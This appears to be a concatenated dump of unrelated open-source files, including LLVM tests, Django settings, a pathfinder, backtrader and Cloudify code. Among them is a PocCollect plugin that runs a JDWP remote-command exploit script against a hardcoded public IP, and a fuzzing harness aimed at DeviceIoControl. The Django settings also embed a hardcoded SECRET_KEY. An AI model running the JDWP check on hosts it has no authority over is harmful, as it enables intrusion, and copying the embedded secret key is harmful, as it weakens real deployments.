= StringIO() sys.stdout = new_stdout @emit_and_execute() def _(): qy.py_print("test text\n") finally: sys.stdout = old_stdout assert_equal(new_stdout.getvalue(), "test text\n") def test_qy_py_printf(): """ Test the py_printf() LLVM construct with arguments. 
""" import sys from cStringIO import StringIO old_stdout = sys.stdout try: new_stdout = StringIO() sys.stdout = new_stdout @emit_and_execute() def _(): @qy.for_(8) def _(i): qy.py_printf("i = %i\n", i) finally: sys.stdout = old_stdout assert_equal( new_stdout.getvalue(), "".join("i = %i\n" % i for i in xrange(8)), ) def test_qy_nested_for_(): """ Test the qy-LLVM for_() loop construct, nested. """ count = 32 iterations = [0] @emit_and_execute() def _(): @qy.for_(count) def _(_): @qy.for_(count) def _(_): @qy.python() def _(): iterations[0] += 1 assert_equal(iterations[0], count**2) def test_qy_assert_(): """ Test the qy-LLVM assert_() construct. """ # should not raise @emit_and_execute() def _(): qy.assert_(True) # should raise from qy import EmittedAssertionError def should_raise(): @emit_and_execute() def _(): qy.assert_(False) assert_raises(EmittedAssertionError, should_raise) def test_qy_random(): """ Test the qy-LLVM random() construct. """ count = 4096 total = [0.0] @emit_and_execute() def _(): @qy.for_(count) def _(_): v = qy.random() @qy.python(v) def _(v_py): total[0] += v_py assert_almost_equal(total[0] / count, 0.5, places = 1) def test_qy_random_int(): """ Test the qy-LLVM random_int() construct. """ count = 32 values = [] @emit_and_execute() def _(): @qy.for_(count) def _(_): v = qy.random_int(2) @qy.python(v) def _(v_py): values.append(v_py) assert_true(len(filter(None, values)) > 8) assert_true(len(filter(None, values)) < 24) def test_qy_select(): """ Test the select() LLVM construct without arguments. """ result = [None, None] @emit_and_execute() def _(): v0 = qy.select(True, 3, 4) v1 = qy.select(False, 3, 4) @qy.python(v0, v1) def _(v0_py, v1_py): result[0] = v0_py result[1] = v1_py assert_equal(result[0], 3) assert_equal(result[1], 4) def test_qy_is_nan(): """ Test LLVM real-value is_nan property. """ @emit_and_execute() def _(): a = qy.value_from_any(-0.000124992188151).is_nan b = qy.value_from_any(numpy.nan).is_nan @qy.python(a, b) def _(a_py, b_py): assert_false(a_py) assert_true(b_py) def test_qy_log(): """ Test the LLVM log() intrinsic wrapper. """ @emit_and_execute() def _(): v0 = qy.log(math.e) @qy.python(v0) def _(v0_py): assert_equal(v0_py, 1.0) def test_qy_log1p(): """ Test the LLVM log1p() construct. """ @emit_and_execute() def _(): v0 = qy.log1p(math.e - 1.0) @qy.python(v0) def _(v0_py): assert_equal(v0_py, 1.0) def test_qy_exp(): """ Test the LLVM exp() intrinsic wrapper. """ @emit_and_execute() def _(): v0 = qy.exp(1.0) @qy.python(v0) def _(v0_py): assert_equal(v0_py, math.e) def test_qy_real_neg(): """ Test the floating-point negation operation. """ @emit_and_execute() def _(): x = qy.value_from_any(3) y = qy.value_from_any(-5) @qy.python(-x, -y) def _(a_py, b_py): assert_equal(a_py, -3) assert_equal(b_py, 5) def test_qy_integer_mod(): """ Test the integer modulo operation. """ @emit_and_execute() def _(): x = qy.value_from_any(3) y = qy.value_from_any(5) z = qy.value_from_any(-2) @qy.python(x % y, y % z, z % y) def _(a_py, b_py, c_py): assert_equal(a_py, 3) assert_equal(b_py, 2) assert_equal(c_py, -2)
mit
2,407,731,293,992,260,000
18.449115
74
0.475145
false
3.366909
true
false
false
blstream/ut-arena
ut_arena_py_api/ut_arena/settings.py
1
3193
""" Django settings for ut_arena_py_api project. Generated by 'django-admin startproject' using Django 1.9.2. For more information on this file, see https://docs.djangoproject.com/en/1.9/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.9/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '!2stj*=!93mhvadu7moo(^ak6(jkl&(y*%q59l=7qj(5+n*-r)' # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'rest_framework', 'rest_framework.authtoken', 'apps.utarena', ] MIDDLEWARE_CLASSES = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'ut_arena.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'ut_arena.wsgi.application' # Password validation # https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.9/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.9/howto/static-files/ STATIC_URL = '/static/' # Rest settings REST_FRAMEWORK = { 'DEFAULT_PERMISSION_CLASSES': ( 'rest_framework.permissions.IsAuthenticated', ), 'PAGE_SIZE': 10, 'DEFAULT_AUTHENTICATION_CLASSES': ( 'rest_framework.authentication.TokenAuthentication', ) }
apache-2.0
7,903,634,078,388,148,000
26.765217
91
0.68932
false
3.551724
false
false
false
brean/python-pathfinding
pathfinding/finder/finder.py
1
6586
# -*- coding: utf-8 -*- import heapq # used for the so colled "open list" that stores known nodes import time # for time limitation from pathfinding.core.util import SQRT2 from pathfinding.core.diagonal_movement import DiagonalMovement # max. amount of tries we iterate until we abort the search MAX_RUNS = float('inf') # max. time after we until we abort the search (in seconds) TIME_LIMIT = float('inf') # used for backtrace of bi-directional A* BY_START = 1 BY_END = 2 class ExecutionTimeException(Exception): def __init__(self, message): super(ExecutionTimeException, self).__init__(message) class ExecutionRunsException(Exception): def __init__(self, message): super(ExecutionRunsException, self).__init__(message) class Finder(object): def __init__(self, heuristic=None, weight=1, diagonal_movement=DiagonalMovement.never, weighted=True, time_limit=TIME_LIMIT, max_runs=MAX_RUNS): """ find shortest path :param heuristic: heuristic used to calculate distance of 2 points (defaults to manhattan) :param weight: weight for the edges :param diagonal_movement: if diagonal movement is allowed (see enum in diagonal_movement) :param weighted: the algorithm supports weighted nodes (should be True for A* and Dijkstra) :param time_limit: max. runtime in seconds :param max_runs: max. amount of tries until we abort the search (optional, only if we enter huge grids and have time constrains) <=0 means there are no constrains and the code might run on any large map. """ self.time_limit = time_limit self.max_runs = max_runs self.weighted = weighted self.diagonal_movement = diagonal_movement self.weight = weight self.heuristic = heuristic def calc_cost(self, node_a, node_b): """ get the distance between current node and the neighbor (cost) """ if node_b.x - node_a.x == 0 or node_b.y - node_a.y == 0: # direct neighbor - distance is 1 ng = 1 else: # not a direct neighbor - diagonal movement ng = SQRT2 # weight for weighted algorithms if self.weighted: ng *= node_b.weight return node_a.g + ng def apply_heuristic(self, node_a, node_b, heuristic=None): """ helper function to apply heuristic """ if not heuristic: heuristic = self.heuristic return heuristic( abs(node_a.x - node_b.x), abs(node_a.y - node_b.y)) def find_neighbors(self, grid, node, diagonal_movement=None): ''' find neighbor, same for Djikstra, A*, Bi-A*, IDA* ''' if not diagonal_movement: diagonal_movement = self.diagonal_movement return grid.neighbors(node, diagonal_movement=diagonal_movement) def keep_running(self): """ check, if we run into time or iteration constrains. 
:returns: True if we keep running and False if we run into a constraint """ if self.runs >= self.max_runs: raise ExecutionRunsException( '{} run into barrier of {} iterations without ' 'finding the destination'.format( self.__class__.__name__, self.max_runs)) if time.time() - self.start_time >= self.time_limit: raise ExecutionTimeException( '{} took longer than {} seconds, aborting!'.format( self.__class__.__name__, self.time_limit)) def process_node(self, node, parent, end, open_list, open_value=True): ''' we check if the given node is path of the path by calculating its cost and add or remove it from our path :param node: the node we like to test (the neighbor in A* or jump-node in JumpPointSearch) :param parent: the parent node (the current node we like to test) :param end: the end point to calculate the cost of the path :param open_list: the list that keeps track of our current path :param open_value: needed if we like to set the open list to something else than True (used for bi-directional algorithms) ''' # calculate cost from current node (parent) to the next node (neighbor) ng = self.calc_cost(parent, node) if not node.opened or ng < node.g: node.g = ng node.h = node.h or \ self.apply_heuristic(node, end) * self.weight # f is the estimated total cost from start to goal node.f = node.g + node.h node.parent = parent if not node.opened: heapq.heappush(open_list, node) node.opened = open_value else: # the node can be reached with smaller cost. # Since its f value has been updated, we have to # update its position in the open list open_list.remove(node) heapq.heappush(open_list, node) def check_neighbors(self, start, end, grid, open_list, open_value=True, backtrace_by=None): """ find next path segment based on given node (or return path if we found the end) :param start: start node :param end: end node :param grid: grid that stores all possible steps/tiles as 2D-list :param open_list: stores nodes that will be processed next """ raise NotImplementedError( 'Please implement check_neighbors in your finder') def find_path(self, start, end, grid): """ find a path from start to end node on grid by iterating over all neighbors of a node (see check_neighbors) :param start: start node :param end: end node :param grid: grid that stores all possible steps/tiles as 2D-list :return: """ self.start_time = time.time() # execution time limitation self.runs = 0 # count number of iterations start.opened = True open_list = [start] while len(open_list) > 0: self.runs += 1 self.keep_running() path = self.check_neighbors(start, end, grid, open_list) if path: return path, self.runs # failed to find path return [], self.runs
mit
-7,266,928,208,447,150,000
35.588889
79
0.58928
false
4.23537
false
false
false
django-id/website
app_author/models.py
1
2195
from django.contrib.auth.models import User from django.core.exceptions import ValidationError from django.db import models from django.db.models.signals import post_save from django.dispatch import receiver # CUSTOM FILE SIZE VALIDATOR def validate_image(fieldfile_obj): """ Limit image size upload """ filesize = fieldfile_obj.file.size megabyte_limit = 0.5 if filesize > megabyte_limit*1024*1024: raise ValidationError("Max file size is %sMB" % str(megabyte_limit)) class Profile(models.Model): """ Author Model """ user = models.OneToOneField( User, on_delete=models.CASCADE ) profile_picture = models.ImageField( upload_to='images/%Y/%m/%d', validators=[validate_image], blank=True, null=True ) profile_name = models.CharField( verbose_name='Name', null=True, blank=True, max_length=50 ) profile_email = models.EmailField( verbose_name='Email Address', null=True, blank=True ) profile_location = models.CharField( verbose_name='Origin/City', null=True, blank=True, max_length=50 ) profile_github = models.URLField( verbose_name='Github URL', null=True, blank=True ) slug = models.SlugField() is_created = models.DateTimeField( null=True, blank=True ) is_moderator = models.BooleanField( default=False, ) def __str__(self): return str(self.user) def save(self, **kwargs): if not self.slug: from djangoid.utils import get_unique_slug self.slug = get_unique_slug(instance=self, field='profile_name') super(Profile, self).save(**kwargs) @receiver(post_save, sender=User) def create_user_profile(sender, instance, created, **kwargs): """ Automatically Create User when Login """ if created: Profile.objects.create(user=instance) @receiver(post_save, sender=User) def save_user_profile(sender, instance, **kwargs): """ Automatically Create User when Login """ instance.profile.save()
mit
-1,107,724,903,978,328,600
21.397959
76
0.618223
false
3.933692
false
false
false
mhl/mysociety-cvs
sitestats/pylib/sitestats/backports/contrib/auth/middleware.py
1
2933
from django.contrib import auth from django.core.exceptions import ImproperlyConfigured class RemoteUserMiddleware(object): """ Middleware for utilizing web-server-provided authentication. If request.user is not authenticated, then this middleware attempts to authenticate the username passed in the ``REMOTE_USER`` request header. If authentication is successful, the user is automatically logged in to persist the user in the session. The header used is configurable and defaults to ``REMOTE_USER``. Subclass this class and change the ``header`` attribute if you need to use a different header. """ # Name of request header to grab username from. This will be the key as # used in the request.META dictionary, i.e. the normalization of headers to # all uppercase and the addition of "HTTP_" prefix apply. header = "REMOTE_USER" def process_request(self, request): # AuthenticationMiddleware is required so that request.user exists. if not hasattr(request, 'user'): raise ImproperlyConfigured( "The Django remote user auth middleware requires the" " authentication middleware to be installed. Edit your" " MIDDLEWARE_CLASSES setting to insert" " 'django.contrib.auth.middleware.AuthenticationMiddleware'" " before the RemoteUserMiddleware class.") try: username = request.META[self.header] except KeyError: # If specified header doesn't exist then return (leaving # request.user set to AnonymousUser by the # AuthenticationMiddleware). return # If the user is already authenticated and that user is the user we are # getting passed in the headers, then the correct user is already # persisted in the session and we don't need to continue. if request.user.is_authenticated(): if request.user.username == self.clean_username(username, request): return # We are seeing this user for the first time in this session, attempt # to authenticate the user. user = auth.authenticate(remote_user=username) if user: # User is valid. Set request.user and persist user in the session # by logging the user in. request.user = user auth.login(request, user) def clean_username(self, username, request): """ Allows the backend to clean the username, if the backend defines a clean_username method. """ backend_str = request.session[auth.BACKEND_SESSION_KEY] backend = auth.load_backend(backend_str) try: username = backend.clean_username(username) except AttributeError: # Backend has no clean_username method. pass return username
agpl-3.0
-5,813,389,405,922,956,000
42.776119
79
0.650869
false
5.030875
false
false
false
perfidia/seleshot
doc/gen_api.py
1
3756
#!/usr/bin/env python # -*- coding: utf-8 -*- import json import os import sys import string sys.path.append('../src') import seleshot TEMPLATE = """=== API === """ OUTPUT = os.path.join("_static", "api.txt") # from http://legacy.python.org/dev/peps/pep-0257/ def trim(docstring): if not docstring: return '' # Convert tabs to spaces (following the normal Python rules) # and split into a list of lines: lines = docstring.expandtabs().splitlines() # Determine minimum indentation (first line doesn't count): indent = sys.maxint for line in lines[1:]: stripped = line.lstrip() if stripped: indent = min(indent, len(line) - len(stripped)) # Remove indentation (first line is special): trimmed = [lines[0].strip()] if indent < sys.maxint: for line in lines[1:]: trimmed.append(line[indent:].rstrip()) # Strip off trailing and leading blank lines: while trimmed and not trimmed[-1]: trimmed.pop() while trimmed and not trimmed[0]: trimmed.pop(0) # Return a single string: return '\n'.join(trimmed) def fmt(doc, indent = 8): return "\n".join([" " * indent + i for i in trim(doc).split("\n")]) if __name__ == '__main__': print "Generating...", s = seleshot.create() s.driver.get("http://example.com") i = s.get_screen() fd = open(OUTPUT, "w") ########################################################################### fd.write(TEMPLATE) fd.write(" " * 0 + ".. autofunction:: seleshot.create") fd.write("\n\n") fd.write(" " * 0 + ".. class:: ScreenShot(object):") fd.write("\n\n") fd.write(" " * 4 + ".. function:: get_screen(self, url = None):\n\n") fd.write(fmt(s.get_screen.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: close(self):\n\n") fd.write(fmt(s.close.__doc__)) fd.write("\n\n") fd.write(" " * 0 + ".. class:: ImageContainer(object):\n\n") fd.write(fmt(i.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: cut_element(self, id = None, xpath = None):\n\n") fd.write(fmt(i.cut_element.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: cut_area(self, x = 0, y = 0, height = None, width = None):\n\n") fd.write(fmt(i.cut_area.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: draw_dot(self, id = None, xpath = None, coordinates = None, padding = 0, color = None, size = None):\n\n") fd.write(fmt(i.draw_dot.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: draw_frame(self, id = None, xpath = None, coordinates = None, padding = None, color = None, size = None):\n\n") fd.write(fmt(i.draw_frame.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: draw_image(self, id = None, xpath = None, coordinates = None, position = Position.MIDDLE, padding = (0, 0), filename = None, image = None):\n\n") fd.write(fmt(i.draw_image.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: draw_zoom(self, id = None, xpath = None, coordinates = None, position = Position.MIDDLE, padding = (0, 0), zoom = None):\n\n") fd.write(fmt(i.draw_zoom.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: draw_blur(self, id = None, xpath = None):\n\n") fd.write(fmt(i.draw_blur.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: save(self, filename):\n\n") fd.write(fmt(i.save.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: is_cut(self):\n\n") fd.write(fmt(i.is_cut.__doc__)) fd.write("\n\n") ########################################################################## fd.close() s.close() print "done"
mit
3,779,118,023,028,133,400
28.809524
183
0.536741
false
3.224034
false
false
false
nanshihui/PocCollect
component/JDWP/JDWPvul.py
1
2106
#!/usr/bin/env python
# encoding: utf-8
from t import T
import os
import platform
import subprocess
import signal
import time
import requests,urllib2,json,urlparse


class TimeoutError(Exception):
    pass


def command(cmd, timeout=60):
    """Run command and return the output
    cmd - the command to run
    timeout - max seconds to wait for
    """
    is_linux = platform.system() == 'Linux'

    p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid if is_linux else None)
    if timeout==0:
        return p.stdout.read()
    t_beginning = time.time()
    seconds_passed = 0
    while True:
        if p.poll() is not None:
            break
        seconds_passed = time.time() - t_beginning
        if timeout and seconds_passed > timeout:
            if is_linux:
                os.killpg(p.pid, signal.SIGTERM)
            else:
                p.terminate()
            raise TimeoutError(cmd, timeout)
        time.sleep(0.1)
    return p.stdout.read()


class P(T):
    def __init__(self):
        T.__init__(self)

    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        result = {}
        result['result']=False
        usecommand='python '+os.path.split(os.path.realpath(__file__))[0]+'/script/jdwpshellifier.py -t '+ip+' -p '+port
        try:
            print usecommand
            msgresult = command(usecommand, timeout=40)
            print msgresult
            if 'Command successfully executed' in msgresult:
                result['result']=True
                result['VerifyInfo'] = {}
                result['VerifyInfo']['type']='Java Debug Wire Protocol vul'
                result['VerifyInfo']['URL'] =ip+':'+port
                result['VerifyInfo']['payload']='Java Debug Wire Protocol poc'
                result['VerifyInfo']['result'] =msgresult
            else:
                pass
        except Exception,e:
            print e.text
        finally:
            return result

if __name__ == '__main__':
    print P().verify(ip='120.24.243.216',port='8001')
mit
-8,082,791,348,985,507,000
31.4
135
0.57265
false
4.05
false
false
false
glmcdona/meddle
examples/example_deviceiocontrol/processes.py
1
1377
from process_base import *
from targets import *
import subprocess
import os

class ProcessDeviceIo(ProcessBase):
    def __init__(self, Controller, crashdump_folder, breakpoint_handler, pid, ph, unique_identifier, verbose, logger):
        # Specific options
        self.path_to_exe = b"C:\\Windows\\System32\\notepad.exe"
        self.command_line = b"notepad.exe"
        self.logger = logger

        # Initialize
        self.initialize(Controller, self.__class__.__name__, crashdump_folder, breakpoint_handler, pid, ph, unique_identifier, verbose)

    def on_debugger_attached(self, Engine):
        # Set the types
        self.Engine = Engine
        self.types = meddle_types(Engine)

        # Add the targets
        Engine.AddTarget(Target_Handles)
        Engine.AddTarget(Target_DeviceIoControl)

        # Handle process loaded
        Engine.HandleProcessLoaded()

        # Start an auto-it script
        try:
            subprocess.Popen(['autoit3.exe', os.path.join(os.path.dirname(__file__), "..", "autoit", "notepad_print.au3"), str(self.pid), ">nul"], shell=True)
        except:
            print "Warning: autoit3.exe not found on path. Please install it and add it to path to increase the attack surface."

        # Resume the process that we created suspended. This is called just after the debugger has been attached.
        if self.start_th >= 0:
            windll.kernel32.ResumeThread(self.start_th);

    def log_csv(self, fields):
        self.logger.log_event(fields)
mit
4,168,101,267,918,378,500
28.319149
149
0.713145
false
3.326087
false
false
false
building39/nebula2
scripts/cdmi_explorer/CDMIMain/handlers.py
1
2951
''' Created on Jun 9, 2013 @author: mmartin ''' import sys from gi.repository import Gtk from CDMIAbout import CDMIAbout from CDMIConnect import CDMIConnect from CDMIHelp import CDMIHelp class Handlers(object): ''' classdocs ''' def __init__(self, session): self.session = session def onAbout(self, *args): CDMIAbout(self.session) def onConnect(self, *args): CDMIConnect(self.session) def onDeleteWindow(self, *args): self.onQuit(*args) def onHelp(self, *args): CDMIHelp(self.session) def onQuit(self, *args): Gtk.main_quit() def onCDMIRowCollapsed(self, *args): treeview = args[0] treeiter = args[1] treepath = args[2] model = treeview.get_model() data = self.session.GET(model[treeiter][1]) self.session.get_children(treeview, treepath, data) self.session.display_cdmi_data(data) def onCDMIRowExpanded(self, *args): treeview = args[0] treeiter = args[1] treepath = args[2] rowname = self._squash_slashes(self.session.cdmimodel.get_value(treeiter, 1)) data = self.session.GET(rowname) treeiter = self.session.cdmimodel.get_iter(treepath) model = treeview.get_model() prefix = rowname if model.iter_has_child(treeiter): num_children = model.iter_n_children(treeiter) for i in range(num_children): if not data: break child = data['children'][i] childpath = self._squash_slashes('%s/%s' % (prefix, child)) childdata = self.session.GET(childpath) childiter = model.iter_nth_child(treeiter, i) self.session.get_children(treeview, model.get_path(childiter), childdata) self.session.display_cdmi_data(data) return def onCDMIRowActivated(self, *args): ''' Display the CDMI data for the selected row. ''' treeview = args[0] treepath = args[1] _column = args[2] model = treeview.get_model() treeiter = model.get_iter(treepath) data = self.session.GET(model[treeiter][1]) self.session.get_children(treeview, treepath, data) self.session.display_cdmi_data(data) def onSelectCursorRow(self, *args): print 'onSelectCursorRow args: %s' % args sys.stdout.flush() def onCursorChanged(self, *args): print 'onCursorChanged args: %s' % args sys.stdout.flush() def _squash_slashes(self, S): T = "" for i in range(len(S)): try: if S[i] == '/' and S[i+1] == '/': i += 1 continue T = T + S[i] except: T = T + S[i] return T
apache-2.0
-8,973,868,036,584,532,000
27.375
85
0.54795
false
3.634236
false
false
false
cliburn/flow
src/plugins/statistics/summary.py
1
1069
"""Provide summary statistics on data.""" from plugin import Statistics from numpy import min, max, mean, median, std class Summary(Statistics): """Plugin to display summary statistics""" name = "Summary" def Main(self, model): """Calculate summary statistics""" self.model = model fields = self.model.GetCurrentData().getAttr('fields') data = self.model.GetCurrentData()[:] low = list(min(data, axis=0)) high = list(max(data, axis=0)) mu = list(mean(data, axis=0)) med = list(median(data)) sig = list(std(data, axis=0)) self.model.NewGroup('Summary statistics') self.model.hdf5.createArray(self.model.current_group, 'min', low) self.model.hdf5.createArray(self.model.current_group, 'max', high) self.model.hdf5.createArray(self.model.current_group, 'mean', mu) self.model.hdf5.createArray(self.model.current_group, 'median', med) self.model.hdf5.createArray(self.model.current_group, 'stdev', sig) self.model.update()
gpl-3.0
-8,669,594,832,415,969,000
41.76
76
0.63985
false
3.636054
false
false
false
mementum/backtrader
backtrader/analyzers/logreturnsrolling.py
1
5020
#!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
#
# Copyright (C) 2015-2020 Daniel Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import (absolute_import, division, print_function,
                        unicode_literals)

import collections
import math

import backtrader as bt

__all__ = ['LogReturnsRolling']


class LogReturnsRolling(bt.TimeFrameAnalyzerBase):
    '''This analyzer calculates rolling returns for a given timeframe and
    compression

    Params:

      - ``timeframe`` (default: ``None``)
        If ``None`` the ``timeframe`` of the 1st data in the system will be
        used

        Pass ``TimeFrame.NoTimeFrame`` to consider the entire dataset with no
        time constraints

      - ``compression`` (default: ``None``)

        Only used for sub-day timeframes to for example work on an hourly
        timeframe by specifying "TimeFrame.Minutes" and 60 as compression

        If ``None`` then the compression of the 1st data of the system will be
        used

      - ``data`` (default: ``None``)

        Reference asset to track instead of the portfolio value.

        .. note:: this data must have been added to a ``cerebro`` instance
                  with ``addata``, ``resampledata`` or ``replaydata``

      - ``firstopen`` (default: ``True``)

        When tracking the returns of a ``data`` the following is done when
        crossing a timeframe boundary, for example ``Years``:

          - Last ``close`` of previous year is used as the reference price to
            see the return in the current year

        The problem is the 1st calculation, because the data has **no
        previous** closing price. As such and when this parameter is ``True``
        the *opening* price will be used for the 1st calculation.

        This requires the data feed to have an ``open`` price (for ``close``
        the standard [0] notation will be used without reference to a field
        price)

        Else the initial close will be used.

      - ``fund`` (default: ``None``)

        If ``None`` the actual mode of the broker (fundmode - True/False) will
        be autodetected to decide if the returns are based on the total net
        asset value or on the fund value. See ``set_fundmode`` in the broker
        documentation

        Set it to ``True`` or ``False`` for a specific behavior

    Methods:

      - get_analysis

        Returns a dictionary with returns as values and the datetime points
        for each return as keys
    '''

    params = (
        ('data', None),
        ('firstopen', True),
        ('fund', None),
    )

    def start(self):
        super(LogReturnsRolling, self).start()
        if self.p.fund is None:
            self._fundmode = self.strategy.broker.fundmode
        else:
            self._fundmode = self.p.fund

        self._values = collections.deque([float('Nan')] * self.compression,
                                         maxlen=self.compression)

        if self.p.data is None:
            # keep the initial portfolio value if not tracing a data
            if not self._fundmode:
                self._lastvalue = self.strategy.broker.getvalue()
            else:
                self._lastvalue = self.strategy.broker.fundvalue

    def notify_fund(self, cash, value, fundvalue, shares):
        if not self._fundmode:
            self._value = value if self.p.data is None else self.p.data[0]
        else:
            self._value = fundvalue if self.p.data is None else self.p.data[0]

    def _on_dt_over(self):
        # next is called in a new timeframe period
        if self.p.data is None or len(self.p.data) > 1:
            # Not tracking a data feed or data feed has data already
            vst = self._lastvalue  # update value_start to last
        else:
            # The 1st tick has no previous reference, use the opening price
            vst = self.p.data.open[0] if self.p.firstopen else self.p.data[0]

        self._values.append(vst)  # push values backwards (and out)

    def next(self):
        # Calculate the return
        super(LogReturnsRolling, self).next()
        self.rets[self.dtkey] = math.log(self._value / self._values[0])
        self._lastvalue = self._value  # keep last value
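A minimal usage sketch for the analyzer above, assuming a strategy and data feed are configured elsewhere; the CSV filename and the analyzer nickname are assumptions:

import backtrader as bt

cerebro = bt.Cerebro()
cerebro.adddata(bt.feeds.BacktraderCSVData(dataname='prices.csv'))  # hypothetical feed
cerebro.addstrategy(bt.Strategy)  # placeholder strategy
cerebro.addanalyzer(bt.analyzers.LogReturnsRolling,
                    timeframe=bt.TimeFrame.Months, _name='logrets')
results = cerebro.run()
print(results[0].analyzers.logrets.get_analysis())  # datetime -> log return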
gpl-3.0
-3,908,883,812,775,189,000
34.857143
79
0.60996
false
4.27234
false
false
false
codilime/cloudify-agent
cloudify_agent/installer/config/decorators.py
1
5377
#########
# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#       http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
#    * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#    * See the License for the specific language governing permissions and
#    * limitations under the License.

from functools import wraps

from cloudify import ctx
from cloudify import context

from cloudify_agent.installer.config.attributes import AGENT_ATTRIBUTES


def attribute(name):

    def decorator(function):

        @wraps(function)
        def wrapper(cloudify_agent):

            # if the property was given in the invocation, use it.
            # inputs are first in precedence order
            if _update_agent_property(name,
                                      props=cloudify_agent,
                                      final_props=cloudify_agent):
                return

            if ctx.type == context.NODE_INSTANCE:

                # if the property is inside a runtime property, use it.
                # runtime properties are second in precedence order
                runtime_properties = ctx.instance.runtime_properties.get(
                    'cloudify_agent', {})
                if _update_agent_property(name,
                                          props=runtime_properties,
                                          final_props=cloudify_agent):
                    return

                # if the property is declared on the node, use it
                # node properties are third in precedence order
                node_properties = ctx.node.properties.get(
                    'cloudify_agent', {})
                node_properties.update(ctx.node.properties.get(
                    'agent_config', {}))
                if _update_agent_property(name,
                                          props=node_properties,
                                          final_props=cloudify_agent):
                    return

            # if the property is inside the bootstrap context,
            # and its value is not None, use it
            # bootstrap_context is forth in precedence order
            attr = AGENT_ATTRIBUTES.get(name)
            if attr is None:
                raise RuntimeError('{0} is not an agent attribute'
                                   .format(name))

            agent_context = ctx.bootstrap_context.cloudify_agent.\
                _cloudify_agent or {}
            context_attribute = attr.get('context_attribute', name)
            if _update_agent_property(context_attribute,
                                      props=agent_context,
                                      final_props=cloudify_agent,
                                      final_key=name):
                return
            if _update_agent_property(name,
                                      props=agent_context,
                                      final_props=cloudify_agent):
                return

            # apply the function itself
            ctx.logger.debug('Applying function:{0} on Attribute '
                             '<{1}>'.format(function.__name__, name))
            value = function(cloudify_agent)
            if value is not None:
                ctx.logger.debug('{0} set by function:{1}'
                                 .format(name, value))
                cloudify_agent[name] = value
                return

            # set default value
            default = attr.get('default')
            if default is not None:
                ctx.logger.debug('{0} set by default value'
                                 .format(name, value))
                cloudify_agent[name] = default
                return

        return wrapper

    return decorator


def group(name):

    def decorator(group_function):

        @wraps(group_function)
        def wrapper(cloudify_agent, *args, **kwargs):

            # collect all attributes belonging to that group
            group_attributes = {}
            for attr_name, attr_value in AGENT_ATTRIBUTES.iteritems():
                if attr_value.get('group') == name:
                    group_attributes[attr_name] = attr_value

            for group_attr_name in group_attributes.iterkeys():
                # iterate and try to set all the attributes of the group as
                # defined in the heuristics of @attribute.
                @attribute(group_attr_name)
                def setter(_):
                    pass
                setter(cloudify_agent)

            # when we are done, invoke the group function to
            # apply group logic
            group_function(cloudify_agent, *args, **kwargs)

        return wrapper

    return decorator


def _update_agent_property(name, props, final_props, final_key=None):
    final_key = final_key or name
    extra_props = props.get('extra', {})
    if name in extra_props:
        final_props[final_key] = extra_props[name]
        return True
    if name in props:
        final_props[final_key] = props[name]
        return True
    return False
apache-2.0
-2,597,727,802,150,284,000
36.340278
